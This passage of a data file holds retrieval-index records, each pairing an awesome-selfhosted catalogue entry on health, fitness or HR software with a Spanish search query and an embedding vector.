-0.02076, -0.05238, 0.11125, -0.0806, -0.02565, -0.02439, 0.00421, 0.06693, 0.03122, 0.14305, -0.04611, -0.05329, 0.01793, 0.13312, 0.01169, 0.01262, 0.08995, 0.0319, -0.15535, -0.02724, -0.0348, 0.00044, -0.07107, 0.01079, 0.00069, -0.02151, 0.01636, 0.00413, 0.03911, 0.03402, -0.0341, -0.05545, 0.03785, 0.05751, 0.05069, -0.01557, 0.02283, -0.08549, -0.01907, -0.12186, -0.00216, 0.04848, 0.09611, 0.03317, -0.03499, 0.06816, 0.01494, 0.00651, -0.05966, 0.01357, -0.15075, -0.03652, 0.01413, -0.02658, 0.06782, -0.01017, 0.00215, 0.05747, 0.02652, -0.05672, 0.04096, -0.04848, -0.04743, -0.02994, 0.06926, 0.00736, -0.04338, 0.04643, -0.0313, 0.12083, -0.05851, 0.03479, -0.07258, 0.00594, -0.03241, 0.08597, 0.04057, -0.08641, 0.01023, 0.04268, 0.01354, 0.01183, 0.00378, -0.01731, -0.04662, 0.00329, 0.0488, 0.04124, 0.01759, -0.0871, 0.07641, -0.03863, 0.02643, -0.09649, 0.06485, -0.00693, -0.00901, 0.05765, -0.08047, 0.00656, 0.04973, -0.08092, 0.0099, 0.06675, 0.07315, 0.03743, -0.03857, -0.0085, -0.06537, -0.10597, -0.08836, -0.03877, -0.0215, -0.07965, -0.04435, -0.04967, -0.0555, -0.02391, 0.00762, -0.03026, -0.00649, -0.00296, -0.04021, 0.08413, 0.07654, 0.05791, 0.03918, 0.00552, 0.11976, 0.04862, -0.04926, -0.01367, -0.01151, 0.00379, -0.02574, 0.07501, 0.02119, 0.10917, 0.04865, 0.01412, -0.00434, 0.06822, 0.03036, 0.04268, -0.03388, -0.00794, -0.00334, 0.00521, 0.0195, 0.0321, 0.05713, 0.02732, 0.00312, 0.01394, -0.0115, 0.01852, 0.10237, 0.05051, -0.02957, 0.01875, -0.06777, -0.01809, -0.13314, 0.05763, 0.01613, -0.05004, -0.0477, 0.05968, 0.04371, -0.01132, 0.07369, -0.02206]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "que programa me sirve para llevar un registro de mis entrenamientos y salud", "v": [0.1061, 0.07359, -0.04211, -0.29663, -0.00033, -0.09879, -0.10338, -0.06765, -0.02964, -0.11028, -0.08595, -0.05587, 0.0968, -0.06032, 0.03015, 0.00785, 0.08736, 0.03072, 0.06644, 0.0356, -0.02345, -0.06169, 0.00242, -0.03252, -0.04546, 0.03979, 0.0471, 0.04973, -0.15605, 0.02863, -0.04904, 0.06761, 0.03553, -0.03545, 0.04876, 0.05856, -0.00926, 0.08763, -0.05342, 0.04846, -0.11778, -0.00231, -0.00787, 0.03672, 0.05908, 0.02804, 0.12663, -0.02264, 0.00287, 0.01892, 0.06179, 0.05736, 0.13783, -0.07629, -0.0718, 0.01581, -0.05298, -0.16201, -0.07482, 0.01184, -0.02198, -0.02666, 0.07453, 0.02579, 0.06566, -0.05741, 0.08707, 0.08493, -0.17389, -0.11756, -0.05281, 0.1267, 0.00728, -0.13568, -0.15298, -0.01618, 0.00649, 0.00105, -0.0616, -0.06844, -0.02979, -0.08872, 0.00068, 0.07515, -0.15933, 0.00619, 0.02293, 0.05289, 0.00919, -0.00558, 0.07885, 0.0174, -0.05202, -0.03124, 0.03788, 0.0985, 0.01702, 0.07281, -0.00119, 0.11596, 0.08303, 0.13621, -0.03989, 0.05856, -0.1206, 0.06134, 0.02044, -0.00038, -0.02208, 0.06505, -0.02748, -0.04599, -0.1197, 0.05293, -0.04662, 0.04285, -0.04345, -0.01898, 0.00055, -0.01184, -0.05676, 0.06545, -0.07545, -0.02184, -0.00205, -0.07929, -0.07848, 0.0654, 0.05728, 0.11991, 0.03428, 0.00978, -0.06811, -0.05087, -0.09095, -0.09021, -0.03496, 0.01912, 0.00688, -0.02837, 0.00784, 0.06625, 0.00235, 0.01417, -0.02948, -0.02812, 0.04014, -0.08992, -0.07707, -0.01926, -0.03704, -0.00903, 0.07529, 0.02642, -0.10387, 0.03269, 0.04117, -0.02429, 0.03282, -0.00686, -0.08156, 0.10052, 0.0092, -0.1105, 0.04697, -0.03926, 0.06771, 0.03243, 0.03313, 0.10684, 0.0014, 0.00613, 0.08608, -0.05088, 0.02544, 0.03014, -0.01855, -0.02935, 0.07165, -0.01453, -0.09516, 0.0899, 0.02042, 0.0163, -0.01277, 0.00524, -0.04886, 0.08164, 0.04116, -0.04469, -0.05949, -0.00585, -0.0054, -0.05846, 0.01351, -0.00778, -0.02388, -0.03438, -0.01542, -0.03462, -0.04187, -0.07692, -0.00201, 0.05129, 0.08516, 0.04962, -0.06057, -0.06182, 0.01033, 0.06525, 0.0154, -0.00401, 0.04737, -0.02112, -0.04898, 0.01659, 0.01194, 0.0754, 0.00391, -0.02753, 0.0042, 0.05409, 0.03052, 0.03175, 0.01461, -0.02427, 0.05292, 0.00733, 0.04411, 0.02285, -0.01891, 0.00178, -0.08366, -0.05107, 0.0003, 0.02145, 0.02596, 0.04165, -0.0436, -0.08011, 0.00016, 0.05016, -0.02562, -0.05652, 0.02395, -0.01175, -0.01087, 0.03928, 0.03765, 0.00484, 0.01008, -0.00607, 0.08274, -0.0402, 0.0647, -0.05739]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "cual es una alternativa libre para gestionar mis historiales mΓ©dicos en casa", "v": [-0.09514, 0.0255, 0.06982, -0.0261, -0.17549, 0.00743, -0.10447, -0.00435, -0.15795, -0.08721, -0.07816, -0.16683, 0.06661, 0.03033, 0.1301, -0.05238, 0.18136, -0.00718, 0.09151, -0.02247, -0.13421, 0.01361, 0.0127, -0.01978, -0.13318, -0.10796, 0.01717, -0.03987, -0.09186, 0.0707, -0.02256, 0.01885, -0.0175, -0.12164, 0.01346, 0.1338, 0.03503, 0.09099, 0.05413, 0.02775, -0.07597, -0.01368, -0.0494, 0.04162, 0.05143, -0.0723, -0.01308, -0.01168, -0.0886, 0.00855, -0.0962, -0.01824, -0.0208, 0.03791, 0.04487, 0.03245, 0.03181, -0.1065, -0.04167, 0.04426, -0.05227, 0.05915, -0.00861, 0.08661, 0.06075, -0.09711, -0.01158, 0.04413, -0.0196, 0.03837, -0.06701, 0.10751, -0.01246, -0.03229, -0.16946, -0.02125, -0.09643, -0.00021, -0.0245, 0.01158, 0.06939, -0.01188, -0.08726, 0.01245, 0.07053, -0.07415, 0.02178, -0.0363, 0.02975, -0.00373, 0.10788, -0.0486, -0.011, 0.05985, 0.05157, 0.05795, 0.09334, -0.00194, -0.00764, 0.05211, 0.03453, 0.06917, -0.04275, 0.13091, 0.03231, 0.00055, -0.01397, -0.00968, -0.08467, -0.05281, -0.17024, 0.07056, -0.00179, 0.08985, -0.03146, 0.00484, -0.02376, 0.03941, 0.00211, -0.02232, -0.12623, -0.02191, 0.00303, -0.02832, -0.03028, 0.04086, 0.09579, -0.01385, -0.01605, 0.14376, 0.02114, -0.02599, -0.05511, -0.12214, -0.07737, -0.03687, 0.04095, -0.0822, 0.01918, -0.08792, -0.05494, 0.04172, -0.00414, -0.04418, 0.07313, -0.17118, -0.09348, -0.00687, 0.00567, 0.02796, -0.1059, 0.06594, -0.02029, 0.15809, -0.04073, 0.06102, 0.03429, -0.00863, -0.105, 0.02601, 0.00058, 0.00714, 0.00516, 0.00551, -0.01069, 0.02635, 0.00581, 0.06304, -0.08461, -0.06528, 0.02172, 0.07396, 0.0171, -0.02035, 0.0242, -0.06996, -0.02434, -0.08517, 0.03864, -0.05935, 0.0512, 0.02087, -0.05096, 0.02637, -0.03249, -0.05751, -0.04328, 0.1072, 0.01144, -0.0327, -0.04333, -0.03058, -0.05864, -0.02323, -0.02688, -0.0423, 0.02066, -0.08447, 0.02535, 0.05735, -0.05855, -0.0134, 0.08432, 0.07477, -0.03688, 0.00737, -0.00121, 0.04548, 0.01133, 0.04661, 0.03027, 0.04143, 0.01398, 0.09931, -0.04706, 0.00717, -0.04925, -0.02644, -0.00808, -0.07229, 0.04235, 0.03447, -0.03629, -0.07664, -0.00701, -0.00591, 0.03555, -0.01641, -0.06432, 0.02582, -0.0148, 0.03006, 0.02372, 0.13771, 0.01105, 0.02758, 0.02861, -0.04225, 0.0067, 0.01552, 0.0175, 0.09352, 0.01513, 0.03285, -0.01258, -0.02077, -0.09799, 0.05435, 0.04133, -0.02844, 0.01168, 0.03008, 0.02876, 0.00585, 0.06314, 0.05123]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "con que puedo montar un sistema para registrar mi actividad fΓ­sica sin depender de servicios externos", "v": [0.08267, 0.12977, -0.17473, -0.21517, -0.03883, -0.02802, -0.11731, 0.01917, -0.16723, -0.11897, -0.04279, -0.04654, 0.02651, -0.08768, 0.13093, 0.01126, -0.01626, -0.12016, -0.01127, 0.03508, -0.10836, -0.13011, 0.05652, 0.0293, 0.00937, 0.12809, 0.0355, -0.11484, -0.18232, 0.03792, 0.04919, 0.11189, 0.10038, -0.09366, -0.02795, -0.07481, -0.00195, -0.00348, 0.07942, -0.04075, -0.03428, -0.00662, 0.03798, 0.02312, 0.03743, 0.04739, -0.05179, -0.1134, -0.03263, -0.0258, 0.01976, -0.03125, -0.07579, -0.10275, -0.05003, -0.04503, 0.04548, -0.08976, 0.00402, -0.06801, 0.03178, 0.14465, -0.06504, 0.07248, 0.10991, 0.01692, 0.07623, -0.03123, -0.07648, -0.03396, 0.02145, -0.10703, -0.06763, -0.04672, -0.0284, 0.04802, 0.09712, -0.06721, 0.00355, 0.04607, -0.08182, 0.05646, -0.03882, 0.13095, -0.06861, -0.05704, -0.06874, -0.03689, 0.06305, 0.08308, 0.09608, 0.07153, -0.00274, -0.0256, -0.0535, 0.0304, -0.0121, 0.12187, -0.04981, 0.06147, 0.06519, 0.16983, -0.02371, 0.10208, 0.03699, -0.12512, 0.03809, -0.02757, -0.01642, -0.0126, -0.01019, 0.00753, -0.13218, -0.05169, -0.09295, 0.00282, -0.06883, -0.05021, -0.00985, 0.09406, -0.06372, 0.02948, 0.06389, -0.07916, 0.02231, -0.02969, 0.00681, 0.04251, 0.01242, 0.07758, 0.09279, -0.02347, -0.05814, -0.07672, -0.02478, -0.00076, -0.07638, 0.0288, 0.03701, 0.03456, 0.06227, -0.00616, -0.03898, -0.06961, 0.01072, -0.01191, 0.09238, -0.03299, -0.11549, -0.0903, -0.02455, 0.06773, -0.04933, 0.02252, -0.07452, 0.02017, 0.06608, -0.07104, 0.01853, 0.03038, -0.0236, 0.09314, -0.02251, 0.00569, 0.0008, 0.01794, -0.0591, -0.07419, 0.04229, 0.04463, -0.06716, 0.05664, 0.04776, -0.09795, 0.07318, 0.02488, -0.04667, -0.02946, 0.04755, 0.01321, -0.02013, 0.07189, 0.02297, 0.00925, -0.07573, 0.05287, -0.05446, 0.00347, 0.01168, -0.01507, 0.03974, -0.01126, -0.04727, 0.02802, 0.03119, -0.06882, -0.02724, 0.01238, 0.0256, -0.04583, -0.05749, -0.02355, 0.00391, -0.01396, 0.00741, 0.04041, 0.02588, 0.06707, 0.076, -0.02203, 0.07349, -0.04222, 0.06573, -0.02685, -0.02513, 0.01948, 0.03304, 0.01328, 0.01404, -0.04493, 0.01863, -0.02444, 0.06239, -0.00242, 0.00169, -0.01768, 0.10686, 0.03391, 0.02818, 0.04117, -0.02866, -0.02715, -0.01764, 0.00078, -0.00562, -0.01479, 0.05528, -0.0436, -0.00405, -0.01813, 0.02823, 0.05865, -0.00168, -0.01587, -0.05137, 0.00255, -0.05337, 0.04575, -0.006, -0.0742, -0.0271, 0.00869, 0.04034, -0.02911, 0.0256, -0.03563]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "que programa hay para montar rutinas de ejercicio minimalistas desde casa?", "v": [0.18221, 0.04183, -0.07882, -0.14179, -0.06704, -0.04979, -0.16739, 0.04537, -0.11066, -0.08378, 0.01805, -0.02644, 0.13419, 0.02151, 0.07131, -0.06739, 0.02219, -0.02307, -0.00213, 0.02041, -0.11651, -0.05123, 0.02866, 0.09592, -0.02459, 0.02672, 0.13903, -0.05165, -0.02982, 0.08327, 0.02886, 0.20213, 0.07838, -0.08596, -0.02819, -0.03252, 0.04325, -0.05643, 0.0582, -0.0897, 0.02117, 0.13682, 0.04923, -0.01076, -0.03505, 0.029, 0.07547, -0.05925, -0.06895, -0.01861, -0.03189, 0.03569, 0.19169, 0.03685, 0.06059, -0.1143, 0.00305, -0.17455, 0.0165, -0.07472, 0.10702, 0.12723, 0.09382, 0.08711, 0.01909, -0.00433, 0.04179, 0.00503, -0.03885, -0.05453, -0.00498, -0.04653, -0.0756, 0.0215, -0.09999, -0.05751, -0.02419, -0.09624, -0.03348, -0.01271, 0.00755, -0.07934, 0.00045, 0.0932, -0.09039, -0.02785, -0.00112, -0.06107, -0.00973, 0.00571, 0.04371, 0.04271, -0.01495, 0.06289, -0.03004, -0.08534, 0.09989, 0.14973, 0.04047, 0.04962, -0.00596, 0.01697, -0.12095, 0.11184, 0.03091, 0.01852, 0.00308, 0.06764, -0.10229, -0.01943, 0.00672, -0.04566, -0.12388, -0.0132, -0.01949, -0.00713, -0.05221, -0.05616, -0.00042, -0.0668, -0.10389, 0.08327, -0.05512, 0.00898, -0.02985, -0.07896, 0.13407, 0.08959, -0.03204, 0.12164, 0.037, 0.03638, -0.00889, 0.00966, -0.06201, 0.00866, -0.03169, -0.02169, -0.04834, -0.05187, 0.06785, 0.04085, 0.01928, -0.05092, 0.06625, 0.00751, 0.03749, -0.02773, -0.06645, 0.11249, 0.02222, 0.09396, -0.00277, -0.00111, 0.00828, -0.03801, 0.04319, -0.02087, 0.0241, 0.03596, -0.07879, 0.07257, -0.04882, -0.11317, 0.02, 0.00499, 0.05666, 0.06855, -0.04077, 0.1031, -0.0414, 0.06012, -0.02462, -0.00842, 0.0236, 0.08126, -0.01857, -0.01629, -0.02418, 0.03031, -0.10669, 0.09268, 0.04942, 0.00849, 0.00583, 0.04212, -0.0268, 0.08319, 0.00629, -0.03134, -0.08661, -0.0404, 0.00726, -0.03417, -0.00576, -0.04478, -0.0033, -0.00148, 0.08676, 0.00634, -0.05945, -0.0548, 0.08491, 0.03394, 0.08996, 0.0778, -0.01151, -0.07013, 0.0701, 0.08385, 0.03703, -0.05429, -0.03101, 0.02403, -0.02811, 0.0424, -0.03713, 0.04847, 0.04868, 0.11294, 0.05269, 0.01344, -0.01701, -0.0118, 0.00922, -0.02379, -0.00223, 0.00999, 0.01691, 0.02377, -0.00388, -0.09003, 0.02492, -0.01258, 0.0347, 0.00779, 0.04453, -0.02072, 0.03327, -0.00322, -0.03324, 0.03291, 0.06673, 0.01567, -0.0108, 0.019, 0.00457, 0.02781, 0.01477, 0.02458, 0.03734, 0.03109, -0.03112, -0.0259, -0.00712, -0.03594]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "cual es una alternativa libre a las apps comerciales de seguimiento deportivo?", "v": [-0.04497, 0.12829, -0.02859, -0.15202, -0.1126, -0.04062, -0.05133, -0.05165, -0.17681, -0.07025, -0.07027, -0.19486, -0.08317, 0.01514, 0.11202, -0.08301, 0.04945, -0.11392, 0.14816, 0.06197, 0.00967, -0.06414, -0.18556, -0.07636, 0.04871, -0.02262, 0.00457, -0.00024, -0.15222, 0.02718, 0.02828, 0.00371, 0.08555, -0.06708, -0.06479, -0.07019, 0.08118, 0.01094, 0.03512, -0.0718, 0.08725, -0.14352, -0.05318, -0.04869, 0.07723, 0.02728, -0.02942, 0.02555, -0.10154, -0.0337, 0.02106, -0.02463, -0.00753, -0.01288, 0.03607, -0.02619, 0.08637, -0.0627, -0.0267, -0.09141, 0.04881, -0.00177, 0.02076, 0.03183, 0.08491, 0.00783, 0.01814, -0.00348, -0.02941, -0.07416, 0.07483, 0.00427, -0.07442, 0.04521, -0.06649, 0.0788, -0.03221, 0.0654, -0.02809, -0.01516, 0.04951, -0.09953, -0.07147, 0.12202, -0.02068, -0.08437, 0.02401, 0.00998, -0.00182, -0.02488, 0.04521, 0.06693, -0.14008, 0.02988, -0.07237, -0.05629, 0.00452, 0.03666, 0.02674, 0.22508, 0.01183, 0.06242, -0.10007, -0.13371, -0.07994, -0.06095, -0.02508, -0.03609, -0.01424, 0.07503, 0.02493, -0.0402, -0.04548, 0.05535, 0.03983, 0.04415, -0.13408, -0.06456, -0.00861, -0.00224, -0.08789, -0.01679, -0.03829, -0.04367, 0.02274, -0.02273, -0.0221, 0.0786, 0.0159, 0.07202, 0.08545, 0.00398, -0.08739, -0.03371, -0.14732, -0.03813, -0.00891, 0.03266, 0.00651, 0.04574, 0.01678, -0.0041, -0.01058, -0.0065, 0.05768, -0.03685, -0.03542, -0.06033, 0.04267, 0.05307, -0.00792, 0.00724, -0.07446, 0.02756, -0.015, 0.02002, 0.01137, -0.03715, -0.0102, 0.03918, 0.02471, 0.05042, -0.01051, -0.04965, 0.03266, -0.07729, 0.04199, -0.01357, 0.05874, 0.05701, -0.05831, 0.03931, 0.04566, -0.15021, 0.03081, -0.05037, -0.00385, -0.02283, 0.07798, -0.0878, -0.0975, 0.03017, -0.07632, 0.01075, -0.04137, -0.09733, -0.08838, 0.01642, 0.01975, 0.03649, -0.03869, 0.08368, -0.08098, -0.07654, -0.0181, -0.0175, 0.00946, -0.0449, -0.02951, -0.02552, -0.1156, -0.00035, -0.00032, 0.02066, -0.02766, 0.05249, -0.00854, 0.07664, -0.00899, 0.01867, -0.00829, -0.00333, 0.07627, 0.05166, -0.06201, -0.07564, 0.01112, 0.01321, 0.01828, -0.03291, 0.07175, 0.02289, 0.06047, -0.0199, -0.04438, 0.05321, 0.03382, 0.1026, -0.00647, -0.02615, -0.0014, 0.03214, 0.00246, 0.02069, 0.01189, 0.01449, -0.00904, 0.00799, -0.01553, -0.0466, 0.08085, 0.06826, -0.02123, -0.00401, -0.06629, 0.01412, -0.06598, 0.0473, -0.02458, -0.09662, -0.0174, 0.0789, 0.03744, -0.03986, 0.08617, 0.00389]} +{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "con que puedo planificar mis entrenamientos y sincronizarlos con mi reloj inteligente sin pagar suscripciones?", "v": [0.16303, 0.03873, -0.11383, -0.12191, 0.06974, -0.11648, -0.08138, 0.01581, -0.13813, -0.07652, -0.07119, -0.04444, 0.14797, -0.04213, 0.02429, 0.0499, -0.04347, 0.03107, -0.02354, 0.0643, -0.05696, -0.02982, -0.01903, -0.10618, -0.03957, -0.03226, -0.01507, 0.09484, -0.23357, 0.02971, -0.15005, 0.10427, 0.09715, -0.01831, 0.12935, 0.05579, -0.03964, 0.20349, -0.04407, 0.02431, -0.11628, 0.02263, 0.0067, 0.01666, 0.09026, 0.04876, 0.05429, 0.0164, -0.01607, 0.07037, -0.0924, 0.06725, 0.09108, 0.04103, -0.06994, -0.017, 0.13868, -0.08325, -0.03249, -0.063, 0.04996, 0.02366, 0.07109, 0.07578, 0.08585, 0.00169, -0.04925, 0.11288, -0.05336, -0.08502, -0.04097, 0.06635, -0.12436, 0.00325, 0.0174, 0.04711, 0.04691, 0.00335, 0.08561, 0.01778, -0.0619, -0.09525, -0.11611, 0.04801, -0.05206, 0.01058, -0.0408, 0.04626, -0.0005, 0.04147, -0.09595, 0.04356, -0.0584, -0.00992, -0.00463, 0.06218, 0.04635, 0.08957, -0.03122, 0.10555, 0.02103, 0.00471, -0.0558, 0.08433, -0.06736, 0.14329, 0.03521, 0.14261, 0.06873, -0.04916, -0.08094, -0.03123, -0.11758, -0.04193, 0.0218, 0.02486, -0.02463, -0.00196, 0.04422, -0.00842, 0.02065, -0.0219, 0.00263, -0.08123, -0.01835, 0.00568, -0.01603, 0.0306, 0.14673, 0.05351, 0.00373, 0.01639, -0.00992, -0.1119, -0.04821, 0.02462, -0.07391, -0.00529, -0.0743, -0.01364, -0.01165, 0.01162, 0.02944, -0.00419, 0.01495, -0.007, 0.03633, -0.05477, -0.12061, -0.03249, -0.07104, 0.00248, 0.09567, 0.05896, -0.05711, -0.06491, 0.04135, -0.06335, 0.05867, 0.03136, -0.01871, 0.07387, 0.01451, -0.07296, 0.06545, -0.06122, 0.01101, -0.00405, -0.03508, 0.10343, 0.02289, 0.0194, 0.05392, -0.05122, -0.00605, -0.05825, -0.00552, -7e-05, 0.04891, -0.01675, -0.01608, 0.11278, -0.0522, -0.02953, -0.07198, 0.00321, 0.0442, 0.06718, 0.02449, -0.05152, 0.01806, -0.00566, 0.0489, 0.02282, 0.04298, -0.01225, -0.05443, -0.05252, -0.03041, 0.00833, -0.0337, 0.01245, 0.01461, 0.05524, 0.04103, 0.05491, 0.02055, 0.02988, -0.04844, 0.03107, 0.05217, -0.01082, 0.11445, -0.03013, -0.0532, 0.04828, 0.04249, -0.01297, -0.05158, -0.00161, 0.06067, 0.08805, 0.02877, -0.00715, 0.00133, -0.01323, 0.04958, 0.09102, 0.05704, 0.03727, -0.05483, 0.01272, -0.07127, -0.01747, 0.00672, 0.04033, 0.02604, 0.02012, -0.04691, -0.02595, 0.01544, -0.00263, 0.0322, -0.0097, -0.03096, -0.05492, -0.01956, -0.00743, -0.00803, -0.04196, 0.02994, 0.04432, 0.0945, -0.07431, 0.07141, -0.03847]} +{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "que programa me ayuda a gestionar empleados y nΓ³minas de mi organizaciΓ³n", "v": [0.03931, 0.13073, -0.00028, -0.27388, 0.10529, -0.03346, -0.0536, -0.0408, -0.2187, -0.0923, -0.07142, -0.08289, 0.15677, -0.10243, -0.00331, -0.02252, 0.16483, -0.0482, 0.00609, 0.08791, -0.04548, 0.06179, 0.06132, 0.10394, -0.07679, -0.00072, 0.09828, -0.10522, -0.00353, 0.05801, 0.02613, -0.1447, -0.03455, -0.14497, 0.12304, 0.13421, -0.09962, -0.05544, 0.02003, 0.06404, -0.13079, 0.0533, -0.00701, -0.00389, 0.13378, 0.00201, 0.04022, -0.00886, 0.0075, 0.08387, -0.10469, -0.03486, -0.00316, -0.0855, -0.07907, -0.0776, -0.09287, -0.04459, -0.15674, 0.03436, -0.09865, -0.02169, -0.05459, 0.02319, 0.06167, 0.09007, 0.12814, -0.084, -0.00703, 0.01326, -0.12024, -0.02187, -0.0875, -0.09915, 0.03531, 0.0096, 0.04761, 0.03838, 0.01366, -0.01403, 0.01583, 0.04373, 0.02232, 0.0645, -0.05873, -0.01263, 0.01508, 0.06306, -0.01853, -0.00774, -0.02887, -0.08332, 0.01953, -0.09691, -0.05157, 0.06201, 0.05322, 0.03654, -0.00356, 0.09844, -0.01439, -0.05543, -0.01821, 0.02174, -0.07765, 0.14171, 0.02567, -0.02905, -0.01034, -0.00851, 0.00693, -0.05887, -0.0067, 0.01916, -0.06103, 0.00027, -0.01124, -0.02509, 0.03196, -0.05014, -0.08579, 0.01473, 0.06606, 0.07083, 0.08422, -0.05653, 0.05163, 0.1025, 0.05996, -0.03069, -0.04587, -0.04164, -0.03879, 0.00856, -0.02099, -0.04572, -0.05642, 0.01396, 0.06116, -0.07604, -0.12143, 0.01026, 0.01544, -0.02491, 0.0667, -0.02354, 0.0536, -0.08006, 0.06676, 0.04628, -0.06932, -0.05812, 0.03865, 0.05168, -0.13373, -0.00951, 0.00714, 0.04585, -0.0518, -0.06233, 0.00588, -0.02827, -0.05445, 0.05613, 0.00088, -0.04417, 0.04765, 0.01903, 0.00302, 0.06485, -0.00205, 0.05062, 0.05917, -0.00727, 0.01992, -0.05106, 0.0267, -0.09682, 0.06119, 0.12525, -0.00605, 0.03839, 0.07464, 0.00248, 0.01008, -0.01313, 0.01235, 0.03891, -0.05733, 0.03133, 0.01074, 0.03887, 0.0024, -0.00273, -0.00501, 0.00719, -0.00537, -0.01343, 0.02985, -0.00831, -0.01561, -0.0895, 0.01856, 0.03037, 0.02644, 0.06047, -0.06309, 0.06632, 0.06639, 0.05524, 0.03007, 0.00287, 0.00607, 0.05225, -0.05333, 0.00433, 0.03941, 0.03332, 0.00929, -0.02975, -0.01746, -0.00948, 0.06097, 0.01085, -0.01388, -0.06228, 0.07182, 0.01053, -0.01733, 0.02808, -0.02305, -0.01109, 0.01104, -0.05075, -0.04327, -0.03885, 0.00602, -0.01864, 0.00816, -0.02635, 0.00454, 0.09146, -0.02596, -0.04355, -0.0484, -0.02691, -0.01353, 0.01629, -0.1001, 0.03645, -0.04075, 0.00784, 0.00407, -0.04362, 0.0226, 0.0163]} +{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, 